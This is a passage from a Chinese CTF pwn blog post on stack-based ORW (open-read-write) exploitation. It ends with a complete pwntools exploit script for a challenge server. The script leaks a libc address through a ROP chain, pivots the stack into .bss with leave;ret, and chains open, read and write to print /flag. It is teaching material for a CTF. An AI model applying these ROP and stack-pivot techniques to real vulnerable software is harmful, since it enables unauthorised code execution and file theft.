<p>返回地址填什么？填vuln就错了，我们得直接去找到执行read(0, buf, 0x130uLL)的指令，才能向newrbp-0x100的位置写入ROP<br><img src="/./images/p2/image-21.png"></p>
<p>这个指令在0x4012CF，我们可以写成vuln+0xF</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">newrbp = elf.bss(0x200)</span><br><span class="line">payload2 = cyclic(0x100) + p64(newrbp) + p64(vuln_addr + 0xF)</span><br><span class="line">io.sendline(payload2)</span><br></pre></td></tr></table></figure>

<p>第三步：现在就是往我们的newbrp-0x100的位置写入flag和orw(flag)，最后将rbp覆盖为bss，返回地址覆盖为leave_ret，完成栈的迁移，执行ROP</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">payload3 = b&#x27;/flag&#x27;.ljust(8,b&#x27;\x00&#x27;)</span><br><span class="line">payload3 += p64(pop_rdi) + p64(newrbp-0x100) +p64(pop_rsi) + p64(0) + p64(open_addr)    # open</span><br><span class="line">payload3 += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(elf.bss(0x400)) + p64(pop_rdx) + p64(0x100) + p64(read_addr)     # read</span><br><span class="line">payload3 += p64(pop_rdi) + p64(1) + p64(write_addr)     #write    #复用我们的rsi和rdx，不用重新pop了</span><br><span class="line"># payload3 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x404500) + p64(pop_rdx) + p64(0x100) + p64(write_addr)</span><br><span class="line">payload3 = payload3.ljust(0x100,b&#x27;\x00&#x27;) + p64(newrbp-0x100) + p64(leave_ret)</span><br><span class="line">io.sendline(payload3)</span><br></pre></td></tr></table></figure>

<h2 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context(log_level=&#x27;DEBUG&#x27;, arch=&#x27;amd64&#x27;, os=&#x27;linux&#x27;)</span><br><span class="line">io = remote(&#x27;node5.anna.nssctf.cn&#x27;,21109)</span><br><span class="line">elf = ELF(&#x27;./vuln&#x27;)</span><br><span class="line">libc = ELF(&#x27;./libc-2.31.so&#x27;)</span><br><span class="line">pop_rdi = 0x401393</span><br><span class="line">ret = 0x40101a</span><br><span class="line">leave_ret = 0x4012be</span><br><span class="line">libc_dump_rsi = 0x2601f</span><br><span class="line">libc_dump_rdx = 0x142c92</span><br><span class="line">vuln_addr = 0x4012C0</span><br><span class="line">puts_plt = elf.plt[&#x27;puts&#x27;]</span><br><span class="line">puts_got = elf.got[&#x27;puts&#x27;]</span><br><span class="line"></span><br><span class="line">payload1 = cyclic(0x100+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)</span><br><span class="line">io.sendlineafter(&#x27;before you try to solve this task.&#x27;,payload1)</span><br><span class="line">puts_addr = u64(io.recvuntil(&#x27;\x7f&#x27;)[-6:].ljust(8,b&#x27;\x00&#x27;))</span><br><span class="line">success(hex(puts_addr))</span><br><span class="line"></span><br><span class="line">libc_base = puts_addr - libc.symbols[&#x27;puts&#x27;]</span><br><span class="line">open_addr = libc_base + libc.symbols[&#x27;open&#x27;]</span><br><span class="line"># read_addr = libc_base + libc.symbols[&#x27;read&#x27;]         </span><br><span class="line">read_addr = elf.plt[&#x27;read&#x27;]</span><br><span class="line">write_addr = libc_base + libc.symbols[&#x27;write&#x27;]</span><br><span class="line">pop_rsi = libc_base + libc_dump_rsi</span><br><span class="line">pop_rdx =  libc_base + libc_dump_rdx</span><br><span class="line"></span><br><span class="line">newrbp = elf.bss(0x200)</span><br><span class="line">payload2 = cyclic(0x100) + p64(newrbp) + p64(vuln_addr + 0xF)</span><br><span class="line">io.sendline(payload2)</span><br><span class="line"></span><br><span class="line">payload3 = b&#x27;/flag&#x27;.ljust(8,b&#x27;\x00&#x27;)</span><br><span class="line">payload3 += p64(pop_rdi) + p64(newrbp-0x100) +p64(pop_rsi) + p64(0) + p64(open_addr)        # open</span><br><span class="line">payload3 += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(elf.bss(0x400)) + p64(pop_rdx) + p64(0x100) + p64(read_addr)         # read</span><br><span class="line">payload3 += p64(pop_rdi) + p64(1) + p64(write_addr)          #write</span><br><span class="line"># payload3 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x404500) + p64(pop_rdx) + p64(0x100) + p64(write_addr)</span><br><span class="line">payload3 = payload3.ljust(0x100,b&#x27;\x00&#x27;) + p64(newrbp-0x100) + p64(leave_ret)</span><br><span class="line">io.sendline(payload3)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>KubanSec
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://kubansec.github.io/posts/1d47/" title="栈上ORW学习总结">http://kubansec.github.io/posts/1d47/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/ORW/" rel="tag"># ORW</a>
              <a href="/tags/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Not-Bad/" rel="tag"># 极客大挑战_2019_Not_Bad</a>
              <a href="/tags/HGAME-2023-week1-orw/" rel="tag"># HGAME_2023_week1_orw</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/posts/6e43/" rel="prev" title="栈迁移学习总结">
                  <i class="fa fa-angle-left"></i> 栈迁移学习总结
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/posts/5849/" rel="next" title="使用glibc-all-in-one和patchelf替换程序依赖的libc文件">
                  使用glibc-all-in-one和patchelf替换程序依赖的libc文件 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">KubanSec</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">53k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">48 分钟</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & <span class="exturl" data-url="aHR0cHM6Ly90aGVtZS1uZXh0LmpzLm9yZw==">NexT.Gemini</span> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
